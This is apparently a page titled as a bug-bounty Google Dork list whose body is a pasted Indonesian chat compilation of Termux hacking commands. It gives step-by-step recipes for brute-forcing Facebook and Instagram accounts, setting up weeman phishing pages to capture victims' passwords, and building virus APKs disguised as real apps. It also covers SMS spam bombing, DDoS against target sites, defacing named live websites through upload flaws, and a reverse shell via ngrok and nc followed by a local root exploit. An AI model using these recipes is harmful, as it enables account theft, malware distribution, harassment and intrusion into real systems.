List of Google Dorks for sites that have responsible disclosure program / bug bounty program

A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting

Google Dorks | Google helps you to find Vulnerable Websites that Indexed in Google Search Results. Here is the latest collection of Google Dorks. A collection of 13.760 Dorks. Author: Jolanda de Koff

Google Dork List - Uncover the Hidden Gems of the Internet ( There are at least 320+ categories ) + Web App

1.[Script Termux] -Cmatrix *apt-get update *apt-get upgrade *apt-get install nmap *apt-get install python *apt-get install list *apt-get install cmatrix *cmatrix [1/11 18.28] ‪+62 821-2770-8489‬: ✓Mempercantik Termux $ pkg update && pkg upgrade $ pkg install ruby cowsay toilet figlet $ pkg install neofetch $ pkg install nano $ gem install lolcat $ cd ../usr/etc $ nano bash.bashrc cowsay -f eyes Cyber | lolcat toilet -f standard Indonesia -F gay neofetch date | lolcat Hack FB rombongan $ apt update && apt upgrade $ pkg install python2 git $ pip2 install mechanize $ git clone http://github.com/pirmansx/mbf $ ls $ cd mbf $ python2 MBF.py Hack FB ngincer $ apt update ( Enter ) $ apt upgrade ( Enter ) $ apt install python2 ( Enter ) $ pip2 install urllib3 chardet certifi idna requests ( Enter ) $ apt install openssl curl ( Enter ) $ pkg install libcurl ( Enter ) $ ln /sdcard ( Enter ) $ cd /sdcard ( Enter ) $ python2 fbbrute.py ( Enter ) Hack Gmail apt-get update && apt-get upgrade $ apt-get install git $ apt-get install python python-pip python-setuptools $ pip install scapy $ git clone https://github.com/wifiphisher/wifiphisher.git $ cd wifiphisher< $ python setup.py install $ cd wifiphisher $ python wifiphisher Nih yang mau hack WiFi Khusus root $apt update $apt upgrade $apt install git $git clone https://github.com/esc0rtd3w/wifi-hacker $ls $cd wifi-hacker $ls $chmod +x wifi-hacker.sh $ls $./wifi-hacker.sh ✓ *ni tutor dari gua* TOOL TERMUX LENGKAP ⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕ Command Termux Hacking...... by:🎭ঔৣஓMuslimCyberSquadঔৣஓீ🎭 ⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕ cara uninstall tool termux rm -rf toolsnya Bermain moon-buggy $ pkg install moon-buggy $ moon-buggy CHATTING VIA TERMUX irssi /connet irc.freenode.net /nick w3wandroid /join #modol $ pkg install irssi $ irssi $ /connect chat.freenode.net $ /nick 1235 12345 di ganti sesuai nama/nick agan $ /join #XCAteam PERKIRAAN cuaca curl http://wttr.in/ (lokasi) Browsing di termux $ pkg install w3m $ w3m www.google.com Linknya bsa diubah Telephone di termux $ pkg install termux-api $ termux-telephony-call nomornya Menampilkan animasi kereta :v $ pkg install sl $ sl menampilkan ikon dan informasi sistem android $ pkg install neofetch $ neofetch menampilkan teks dalam format ASCII $ pkg install figlet $ figlet masukin teksnya MEMUTAR MUSIC DI YOUTUBE VIA TERMUX $ pip install mps_youtube $ pip install youtube_dl $ apt install mpv $ mpsyt $ /judul lagu Tinggal pilih lagu dengan mengetik nomornya musikan di termux $ pkg install mpv $ mpv/sdcard/lagu.mp3 /sdcard/ bisa di ganti sesuai letak music CRACK PASSWORD HASH $ git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/ $ cd FHX-Hash-Killer $ python2 FHXHashKiller.py $ git clone https://github.com/UltimateHackers/Hash-Buster $ cd Hash-Buster $ python2 hash.py ASCII ART MAPS​​​ - pkg install update && upgrade - pkg install perl - git clone https://github.com/x-xsystm/maps.git - cd maps - perl maps.pl - untuk Zoom tekan ​A​ - Password: ​(pejuang212)​ CARA MENGHIAS TAMPILAN TERMUX TOXIC TEAM $ pkg update && pkg upgrade $ pkg install ruby cowsay toilet figlet $ pkg install neofetch $ pkg install nano $ pkg install ncurses-utils $ pkg install ruby $ pkg install lolcat $ pkg install cowsay $ gem install lolcat $ nano .bashrc clear blue='\e[1;34m' green='\e[1;32m' purple='\e[1;35m' cyan='\e[1;36m' red='\e[1;31m' white='\e[1;37m' yellow='\e[1;33m' NOW=`date "+%d.%m.%Y"` TIME=`date "+%H:%M"` cowsay -f eyes **Welcome To TOXIC hacking tool** | lolcat toilet -f standard " **TOXIC** " -F gay neofetch echo " Time : " $TIME | lolcat date | lolcat echo echo Username : Cyber | lolcat echo Hostname : TOXIC | lolcat echo echo @localhost:~# | lolcat echo root@localhost:~$ | lolcat echo -e $green echo root@CYBER:~$ TUTORIAL MEMBUAT VIRUS SEPERTI APLIKASI ASLINYA Tools yang dibutuhkan: APK Editor & tool vbug APK Editor bisa didownload di playstore Tool vbug https://www.mediafire.com/file/6hs6y71ryw10uvw/vbug.zip 1. Download tool vbugnya dulu 2. Taruh file tool vbug di luar folder pada memori internal 3. Buka termux lalu $ cd /sdcard 4. $ unzip vbug.zip 5. $ cd vbug 6. $ python2 vbug.py 7. Enter 8. Ketik 10 9. Ketik E 10. Aplikasi virusnya sudah jadi Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya 1. Buka APK Editor 2. Klik Select an Apk File 3. Pilih aplikasi virus tadi 4. Klik full edit 5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan 6. Lalu klik files 7. Klik res/drawable 8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan Catatan: format logo harus .png 9. Ceklist logo yang kedua lalu replace 10. Pilih file logo yang mau dijadikan logo aplikasi agan 11. Back sampai home Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita 12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan 13. Klik build 14. Tunggu hingga selesai 15. Jadi deh VBugMaker Termux -apt update && apt upgrade -apt install git -apt install python Donwload file ->http://upfile.mobi/YGwg8gQLuvv Pindah ke directory Next -unzip vbug.zip -mv vbug $HOME -cd vbug -ls -chmod +x vbug.py -python2 vbug.py #Done BOOM SPAM DI TERMUX apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default aja Spam bom mall $ pkg install update $ pkg install upgrade $ pkg install wget $ pkg install php $ wget http://files-store.theprivat.ml/uploads/bom-mall.zip $ unzip bom-mall.zip $ cd bom-mall $ php run.php (Install *SpamTsel*) $ pkg install curl $ pkg install php $ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php $ chmod 777 bombtsel.php $ php bombtsel.php 3) Tool Spam LITESPAM $ pkg install php $ pkg install toilet $ pkg install sh LITESPAM $ pkg install git $ git clone https://github.com/4L13199/LITESPAM $ cd LITESPAM $ sh LITESPAM.sh atau bash LITESPAM.sh Masukan Nomer nya... Spammer GRAB $pkg install python2 $pip2 install requests $pkg install git $git clone http://github.com/p4kl0nc4t/Spammer-Grab $cd Spammer-Grab $python2 spammer.py nomor hp korban --delay 30 ‌spam sms jdid 1.PKG install PHP 2.pkg install cURL 3.curl https://pastebin.com/raw/9BYy1 JVc -o jdid.php 4.php jdid.php Hacking spammer by seni $apt update && apt upgrade $apt install python2 php $pip2 install requests $apt install nano $apt install git $git clone https://github.com/Senitopeng/ SpamSms.git $cd SpamSms $python2 mantan.py HACKING DAN TRICK FB VIA TERMUX AUTO BOOT FACEBOOK $ git clone https://github.com/Senitopeng/BotFbBangDjon.git $ cd BotFbBangDjon $ python2 bangdjon.py Cara crack id fb https://findmyfbid.in/ git clone https://github.com/tomiashari/fb-autoreaction.git cd fb-autoreaction python2 fb-autoreaction HACKING THOOLS MBF FACEBOOK $ pkg update && upgrade ‬$ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/pirmansx/mbf $ cd mbf $ python2 MBF.py (HACKING FB LEWAT TERMUX) $ apt update $ apt upgrade $ apt install python2 $ apt install python2-dev $ apt install wget $ dip2 install mechanize $ cd/sterage/emulated/0 $ python2 fbbrute.py ( yg tdi di download di tunda di luar folder ) $ storage/emulated/0/fassword.txt ( sama kya yang tadi di download trus tinda di luar folder ) =tinggal tunggu fassword nya muncul Jika beruntung BRUTEFORCE $ apt update $ apt upgrade $ apt install python $ apt install pip $ pip install wordlist $ apt install worlist $ Wordlist -h $ cd /sdcard $ Cat pas.txt FACEBOOK BRUTO FORCE $ apt update $ apt upgrade $ apt install python2 $ apt install python2-dev $ apt install wget $ pip2 install mechanize $ cd/storage/emulated/0 $ python2 fbbrute.py $ storage/emulated/0/password.txt Hacking tool weeman $ apt-get update $ apt-get upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/evait-security/weeman.git $ ls $ cd weeman $ ls $ python2 weeman.py $ show $set url https://www.facebook.com $set action_url https://www.facebook.com $ show buka new season (new tab) /lembar ke 2 $ ifconfig jika slesai copy no addres yg tertera. jngn sampai salah karna ada 2 addres disitu. jika tdk tau yg mna tanya. stelah copy no adres. buka lembar pertama lagi tulis $ run kasih adres tdi ke target. contoh 125.25.175.88:8080 ingt hrus ksh port > :8080 jika sudah dibuka dngn dia. saat dia login nnti. email. pass. tertera. serta data" akun target.... hacking fbbrute2 by decsec $ apt update (enter) $ apt upgrade (enter) $ apt install python2 (enter) $ apt install wget (enter) $ pip2 install mechanize (enter) $ cd /sdcard (enter) $ mkdir facebrute (enter) $ cd facebrute (enter) $ wget http://override.waper.co/files/facebook.apk $ wget http://override.waper.co/files/password.apk $ mv facebook.apk facebook.py (enter) $ mv password.apk password.txt (enter) $ python2 facebook.py (enter) #Selesai *note: Untuk masalah wordlist bisa buat sendiri kok ^^. Buat sendiri lebih efektif... hacking fbbrute3 $ Apt update ( Enter ) $ Apt upgrade ( Enter ) $ Apt install python2 ( Enter ) $ Pip2 install urllib3 chardet certifi idna requests( Enter ) $ Apt install openssl curl ( Enter ) $ Pkg install libcurl ( Enter ) $ Ln -s/sdcard ( Enter ) $ cd sdcard ( Enter ) $ Python2 fb.py ( Enter ) Hacking Botkomena fb $pkg update && pkg upgrade $pkg install git $pkg install python2 $pip2 install mechanize $git clone https://github.com/Senitopeng/ Botkomena.git $cd Botkomena $python2 botkomena.py Cara Install OSIF ( Open Source Information Facebook ) $ pkg install python2 $ git clone https://github.com/ciku370/OSIF $ cd OSIF $ pip2 install -r requirements.txt Dan cara menjalankannya menggunakan perintah : python2 osif.py weemen 1.download dulu termux 2.instal termux :V 3.ketik apt install git python2 4.ketik git clone https://github.com/evait-security/weeman.git 5.ketik cd weeman 6.ketik python2 weeman.py kalau udh ke install seperti ini 1.ketik set url https://m.facebook.com 2.ketik set action_url https://m.facebook.com/login 3.ketik run Kalau sudah begini . ketik 127.0.0.1:8080 pada browser maka web pishing yg di buat tadi sudah jadi lalu lemparkan ke target link 127.0.0.1:8080 lalu kalau korban terjebak , di mana email dan password nya ? masuk dalam termux jangan di tutup weeman tidak hanya dapat di gunakan sebagai media pishing facebook saja. kita juga dapat membuat web pishing situs lainya misalnya twitter instagram dll asal memiliki/terdapat form input Hacking instagram $ apt update && apt upgrade -y $ apt install nodejs git $ cd Instagram-Private-Tools $ node index.js $ git clone https://github.com/ccocot/Instagram-Private-Tools.git $ npm install *HACK INSTAGRAM* ( sosial engineering) $ apt update && apt upgrade $ pkg install python $ pkg install git $ pkg install nano $ git clone https://github.com/avramit/instahack.git $ ls $ cd instahack $ ls $ pip install requests $ cd instahack $ nano pass.txt $ cat pass.txt $ ls $ python hackinsta.py Localizar ip Apt install python git git clone https://github.com/maldevel/IPGeoLocation.git cd IPGeoLocation chmod +x ipgeoLocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t http://www.google.com Lacak IP git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IP yang ingin dilacak TOOL DDOS VIA TERMUX 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py RED_HAWK tool $ apt update $ apt install git $ git clone https://github.com/Tuhinshubhra/RED_HAWK $ cd RED_HAWK $ chmod +x rhawk.php $ apt install php $ ls $ php rhawk.php ‌```Install webdav ``` $ apt update && upgrade $ apt install python2 $ pip2 install urllib3 chardet certifi idna requests $ apt install openssl curl $ pkg install libcurl $ ln -s /sdcard $ cd sdcard $ mkdir webdav $ cd webdav ‌Tutorial Install *Tools-B4J1N64Nv5* pkg install update pkg install git pkg install toilet pkg install figlet pip2 install lolcat git clone https://github.com/DarknessCyberTeam/B4J1N64Nv5 cd B4J1N64Nv5 sh B4J1N64N.sh ‌cara install termux ubuntu - apt update/pkg update - apt upgrade/pkg upgrade - pkg install git - pkg install proot - pkg install wget - git clone https://github.com/Neo-Oli/termux-ubuntu - cd termux-ubuntu - chmod +x ubuntu.sh - pip install -r requirements.txt - ./ubuntu.sh Untuk menjalankan - ./start.sh Cara install github tembak XL Dari awal 1.pkg upgrade 2.pkg update 3.pkg install git 4.pkg install python 5.git clone https://github.com/albertoanggi/xl-py 6.pip install -r requirements.txt 7.chmod +x app.py 8.python/python2 app.py *Install admin finder in termux* $ apt update && apt upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/AdheBolo/AdminFinder *Menjalankan* $ ls $ cd AdminFinder $ chmod 777 AdminFinder.py $ python2 AdminFinder.py *Cara install tool Mr.Rv1.1* $apt update && apt upgrade $pkg install git $pkg install gem $pkg install figlet $gem install lolcat $git clone https://github.com/Mr-R225/Mr.Rv1.1 $cd Mr.Rv1.1 $sh Mr.Rv1.1.sh tool install $ apt update && apt upgrade $ apt install git $ git clone https://github.com/aryanrtm/4wsectools cd 4wsectools chmod 777 tools ./tools TOOL FSOCIETY $ git clone https://github.com/manisso/fsociety $ cd fsociety $ ./install.sh $ ls $ python2 fsociety.py SQLMAP apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap https://github.com/sqlmapproject/sqlmap.git cd sqlmap Python2 sqlmap.py Exemplo Python2 sqlmap.py -u website –dbs -D acuart –tables -D acuart -T users –columns -D acuart -T users -C name,email,phone -dump BUSCA PAINEL ADM DE SITE pkg install git git clone https://github.com/Techzindia/admin_penal cd admin_penal chmod +x admin_panel_finder.py python2 admin_panel_finder.py HAKKU apt install pytho apt install git mkdir vasu git clone https://github.com/4shadoww/hakkuframework cd hakkuframework chmod +x hakku python hakku show modules use whois show options set target examplesite.com run TOOL D-TECT apt update apt install git git clone https://github.com/shawarkhanethicalhacker/D-TECT cd D-TECT apt install python2 chmod +x d-tect.py python2 d-tect.py examplesite.com viSQL apt update apt install python2 apt install git git clone https://github.com/blackvkng/viSQL cd viSQL python2 -m pip install -r requirements.txt python2 viSQL.py python2 viSQL.py -t http://www.bible-history.com Hash Buster apt update apt upgrade apt install python2 apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster python2 hash.py tool ubuntu $ apt update $ apt install git $ apt install wget $ apt install proot $ git clone https://github.com/Neo-Oli/termux-ubu&#8230; $ cd termux-ubuntu $ chmod +x ubuntu.sh $ ./ubuntu.sh $ ./start.sh (````Install``` *Hunner framework*) $ apt update $ apt install python $ apt install git -y $ git clone https://github.com/b3-v3r/Hunner $ cd Hunner $ chmod 777 hunner.py $ python hunner.py *Cara Install Lazymux di Termux* $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Gameye98/Lazymux $ cd Lazymux $ chmod +x lazymux.py $ python2 lazymux.py Cara install tools daijobu* Fungsinya nanti liat sendiri lah di dalem tools nya $apt upgrade && apt update $apt install php $apt install git Kalo udah selesai langsung masukan git nya dengan perintah $git clone https://github.com/alintamvanz/diejoubu $cd diejoubu $cd v1.2 $php diejoubu.php Hecker RECONDOG apt update apt install python python2 apt install git git clone https://github.com/UltimateHackers/ReconDog cd ReconDog chmod +x dog.py Python2 dog.py DEFACE Hacking Script-Deface $apt update $apt upgrade $apt install git $apt install python2 $git clone https://github.com/Ubaii/script-deface-creator $ls $cd script-deface-creator $ls $chmod +x create.py $ls $python2 create.py done semoga bisa bikin script Html CARA DEFACE Cara1 Siapkan script sendiri.. 1.buka browser kalian apa saja terserah lalu ke google 2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search 3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut (sitefinity/usercontrols/dialog/documenteditordialog.aspx) tanpa buka tutup kurung! E http://sitetarget*org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx 4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian 5.klik yang di bawah nya tunggu sampai loading selesai 6.tambah link target tadi dengan (/files) contoh http://sitetarget*org/files/namascriptdefacekalian.html lalu klik search 7.selesai!! Cara2 Method/metode KCFinder Inurl:/kcfinder/browse.php Inurl:/Kcfinder/ Langsung saja upload file deface anda,lalu panggil dengan tambahan /file/namasckamu.html Contoh: https://basukiwater.com/kcfinder/browse.php jadi https://basukiwater.com/file/namasckamu.html cara3 Deface Onion.to File Upload Tutor ini sekarang lagi Ngtreend & Simple , tapi ingat ya bukan Deepweb melaikan Fake Deepweb hehehe... Mari kita Lanjut... Dork : - inurl:/upload site:.onion.to - intext:"Upload" site:.onion.to Live : https://tt3j2x4k5ycaa5zt.onion.to/upload.php Step By Step : 1. Dorking Dulu 2. Pilih Web Target 3. Pilih File yang mau di'upload 4. Tinggal klik Upload => Done 😆 Contoh Target : https://tt3j2x4k5ycaa5zt.onion.to/uploads/lopeyou.html https://danwin1210.me/uploads/lopeyou.html https://temp.xn--wda.fr/e719x8JgJ.html Mirror?! 😆 https://www.defacer.id/296011.html https://www.defacer.id/296024.html cara4 Metode com media Bahan : 1. Dork : - inurl:com_media site:com - inurl:com_media intext:"Upload" 2. Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= 3. Upload'an : Format .txt 😁 Live Target : http://www.james-insurance.co.uk/ Step by Step : gunakan Live Targert dulu untuk Uji Coba 😁 1. Masukkan dork : inurl:com_media intext:"Upload" site:co.uk 2. Pilih salah satu Web 3. Masukkan Exploit http://www.james-insurance.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= 4. Lalu Upload file dalam tempat upload ( format .txt ) Akses shell ? Tambahkan : /images/namafile.txt contoh : http://www.james-insurance.co.uk/images/fac.txt Nanti Jadi Gini Hasilnyaa.. Mudah Bukan?! Tinggal Upload ke Defacer.id 😁 cara5 [POC] Vulnerability Simplicity Of Upload #Step 1: Dork: “Powered By: © Simplicity oF Upload” #Step 2: Exploit: http://[situstargetkamu]/PATH/upload.php *Tergantung dengan target. #Step 3: llowed file: gif, jpg, png, txt, php, asp, cgi, zip, exe, mp3, etc (not allowed for html) #Step 4: Preview: http://[situstargetkamu]/upload/[Your File] #Step 5: Live Demo: http://www.railfaneurope.net/pix/upload.php http://www.formplas.com/upload/upload.php *Di google masih banyak kok Nah, saya kira cukup segitu aja kok, karena mudah tuh tutorial nya. Kalau masih ada yang bin [8/11 06.41] ‪+62 838-5688-2861‬: TOOL TERMUX Cara Install D-tect tool di android termux (command ) : $ apt install git $ apt install python2 $ git clone https://github.com/shawarkhanethicalhacker/D-TECT $ ls $ cd $ chmod +x d-tect.py $ python2 d-tect.py cara uninstall tool termux rm -rf toolsnya cara buat virus cd /sdcard cd vbug ls chmod vbug.py chmod -v vbug.py python2 vbug.py irssi /connet irc.freenode.net /nick w3wandroid /join #modol _________________________ DDOS via Termux 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 104.27.146.125 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py _________________________________________ Bermain moon-buggy $ pkg install moon-buggy $ moon-buggy ________________________________________ musikan di termux $ pkg install mpv $ mpv/sdcard/lagu.mp3 /sdcard/ bisa di ganti sesuai letak musik ________________________________________ Browsing di termux $ pkg install w3m $ w3m www.google.com Linknya bsa diubah ________________________________________ Telephone di termux $ pkg install termux-api $ termux-telephony-call nomornya _______________________________________ Menampilkan animasi kereta :v $ pkg install sl $ sl _______________________________________ menampilkan ikon dan informasi sistem android $ pkg install neofetch $ neofetch _______________________________________ menampilkan teks dalam format ASCII $ pkg install figlet $ figlet masukin teksnya _______________________________________ $ pip install mps_youtube $ pip install youtube_dl $ apt install mpv $ mpsyt $ /judul lagu Tinggal pilih lagu dgn mengetik nomornya.  Tutorial membuat virus seperti aplikasi aslinya🚨 Tools yang dibutuhkan: APK Editor & tool vbug APK Editor bisa didownload di playstore Tool vbug https://www.mediafire.com/file/6hs6y71ryw10uvw/vbug.zip 1. Download tool vbugnya dulu 2. Taruh file tool vbug di luar folder pada memori internal 3. Buka termux lalu $ cd /sdcard 4. $ unzip vbug.zip 5. $ cd vbug 6. $ python2 vbug.py 7. Enter 8. Ketik 10 9. Ketik E 10. Aplikasi virusnya sudah jadi Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya 1. Buka APK Editor 2. Klik Select an Apk File 3. Pilih aplikasi virus tadi 4. Klik full edit 5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan 6. Lalu klik files 7. Klik res/drawable 8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan Catatan: format logo harus .png 9. Ceklist logo yang kedua lalu replace 10. Pilih file logo yang mau dijadikan logo aplikasi agan 11. Back sampai home Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita 12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan 13. Klik build 14. Tunggu hingga selesai 15. Jadi deh auto boot fb git clone https://github.com/Senitopeng/BotFbBangDjon.git cd BotFbBangDjon python2 bangdjon.py melihat id fb https://findmyfbid.in/ git clone https://github.com/tomiashari/fb-autoreaction.git cd fb-autoreaction python2 fb-autoreaction cara membuat virus cd Vbug/vbug.py cd /storage/emulated/0/Vbug cd vbug Python2 vbug.py CRACK PASSWORD HASH git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/ cd FHX-Hash-Killer python2 FHXHashKiller.py git clone https://github.com/UltimateHackers/Hash-Buster $ cd Hash-Buster $ python2 hash.py pkg install irssi irssi (enter) /connect chat.freenode.net /nick oki /join #mrmaze Cara install Metasploit di termux (No Root) ~ apt update && apt upgrade ~ apt install curl ~ curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh ~ chmod +x metasploit.sh ~ ./metasploit.sh ... Tunggu proses instalasi sekitar 30-40 menit tergantung koneksi internet ... ( hack fb via termux ) $apt update $apt upgrade $apt install python2 $apt install python2-dev $apt install wget $dip2 install mechanize $cd/sterage/emulated/0 $python2 fbbrute.py ( yg tdi di download di tunda di luar folder ) $storage/emulated/0/fassword.txt ( sama kya yang tadi di download trus tinda di luar folder ) =tinggal tunggu fassword nya muncul Jika beruntung *silahkan mencoba* tool install $ apt update && apt upgrade $ apt install git $ git clone https://github.com/aryanrtm/4wsectools cd 4wsectools chmod 777 tools ./tools pip install mps_youtube pip install youtube_dl apt install mpv mpsyt /judul $ pkg update && pkg upgrade CHATTING VIA TERMUX $ pkg install irssi $ irssi $ /connect chat.freenode.net $ /nick 1235 12345 di ganti sesuai nama/nick agan $ /join #XCAteam 100% work boom spam apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default ajjhj +6282399188718 Spam bom mall $ pkg install update $ pkg install upgrade $ pkg install wget $ pkg install php $ wget http://files-store.theprivat.ml/uploads/bom-mall.zip $ unzip bom-mall.zip $ cd bom-mall $ php run.php (```Install``` *SpamTsel*) $ pkg install curl $ pkg install php $ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php $ chmod 777 bombtsel.php $ php bombtsel.php 3) Tool Spam LITESPAM $ pkg install php $ pkg install toilet $ pkg install sh $ pkg install git $ git clone https://github.com/4L13199/LITESPAM $ cd LITESPAM $ sh LITESPAM.sh atau bash LITESPAM.sh Masukan Nomer nya... VBugMaker Termux -apt update && apt upgrade -apt install git -apt install python Donwload file ->http://upfile.mobi/YGwg8gQLuvv Pindah ke directory Next -unzip vbug.zip -mv vbug $HOME -cd vbug -ls -chmod +x vbug.py -python2 vbug.py #Done Cara Root Server Di Termux Dengan Ngrok Perl/PHP BackConnecter Mass Deface. 1. Install~ Buka Termux 2. Install Ngrok Registrasi Autthokennya. (http://ngrok.com/download;http://ngrok.com/signup) $ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip $ unzip ngrok-stable-linux-arm.zip ngrok $ ./ngrok authtoken JWJDKNxxxxxxxxxx $ ./ngrok tcp port :~# Welcome : Plan Free "0.tcp.ngrok.io:port-ngrok ~> localhost:port" 3. Download Perl/PHP Backconnecter (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) dan Edit file nya, cari $ip dan $port ganti dengan (0.tcp.ngrok.io:port-ngrok) ~>Upload ke website (PERL: ON)(PHP: ON) 5. in termux command : $ nc -lnvp port 6. in backdoor shell : $ perl perl-reverse-shell.pl (atau) > http://situs.co.li/perl-reverse-shell.php (Run the script simply by browsing to the newly uploaded file in your web browser) .----(after backconnect successfully)--- 7. upload LOCALROOT $ wget https://domain.com/localroot/dirty $ chmod 777 dirty $ ./dirty New password: ndasmu (successfully rooted) 8. import TTY shell ===>jika menggunakan dirty<=== $ echo "import pty; pty.spawn('/bin/bash')" > /tmp/sad.py $ python /tmp/sad.py ===>jika menggunakan cowroot<=== $ python -c 'import pty;pty.spawn("/usr/bin/passwd")' (https://evertpot.com/189/) .-------------------------------------------- 9. login as ROOT $ su rintoar Password: ndasmu .-------------------------------------------- 10 ./mass (https://m.youtube.com/watch?v=HPQQok40v78) .-------------------------------------------- WEEMAN [✓] apt update && apt upgrade -y apt install git -y apt install python2 -y git clone https://github.com/evait-security/weeman cd weeman chmod 777 weeman.py python2 weeman.py Ex set url http://facebook.com set action_url http://facebook.com run ___________________________________________ Hunner framework apt update apt install python apt install git -y git clone https://github.com/b3-v3r/Hunner cd Hunner chmod 777 hunner.py python hunner.py ___________________________________________ SQLMAP [✓] apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap cd sqlmap Python2 sqlmap.py ______ Exemplo Python2 sqlmap.py -u website –dbs -D acuart –tables -D acuart -T users –columns -D acuart -T users -C name,email,phone -dump ___________________________________ DDOS XERXES [✓] clang xerxes.c -o xerxes ./xerxes website 80 ___________________________________ DDOS TORSHAMMER [✓] apt-get update apt-get install python2 apt-get install tor apt-get install git git clone https://github.com/dotfighter/torshammer.git cd torshammer python2 torshammer.py -T -t website ___________________________________ BRUTEFORCE [✓] apt update apt upgrade apt install python apt install pip pip install wordlist apt install worlist Wordlist -h cd /sdcard Cat pas.txt ___________________________________ Localizar ip Apt install python git git clone https://github.com/maldevel/IPGeoLocation.git cd IPGeoLocation chmod +x ipgeoLocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t http://www.google.com ___________________________________ Hecker RECONDOG apt update apt install python python2 apt install git git clone https://github.com/UltimateHackers/ReconDog cd ReconDog chmod +x dog.py Python2 dog.py ___________________________________ BUSCA PAINEL ADM DE SITE pkg install git git clone https://github.com/Techzindia/admin_penal cd admin_penal chmod +x admin_panel_finder.py python2 admin_panel_finder.py ___________________________________ HAKKU apt install pytho apt install git mkdir vasu git clone https://github.com/4shadoww/hakkuframework cd hakkuframework chmod +x hakku python hakku show modules use whois show options set target examplesite.com run ___________________________________________ RED HAWK apt update apt install git git clone https://github.com/Tuhinshubhra/RED_HAWK cd RED_HAWK chmod +x rhawk.php apt install php ls php rhawk.php ___________________________________________ D-TECT apt update apt install git git clone https://github.com/shawarkhanethicalhacker/D-TECT cd D-TECT apt install python2 chmod +x d-tect.py python2 d-tect.py examplesite.com ___________________________________________ viSQL apt update apt install python2 apt install git git clone https://github.com/blackvkng/viSQL cd viSQL python2 -m pip install -r requirements.txt python2 viSQL.py python2 viSQL.py -t http://www.bible-history.com __________________ Hash Buster apt update apt upgrade apt install python2 apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster python2 hash.py PERKIRAAN cuaca curl http://wttr.in/ (lokasi) tool Routersploit apt install git apt install python2 pip2 install requests git clone https://github.com/reverse-shell/routersploit.git cd routersploit pip install -r requirements.txt termux-fix-shebang 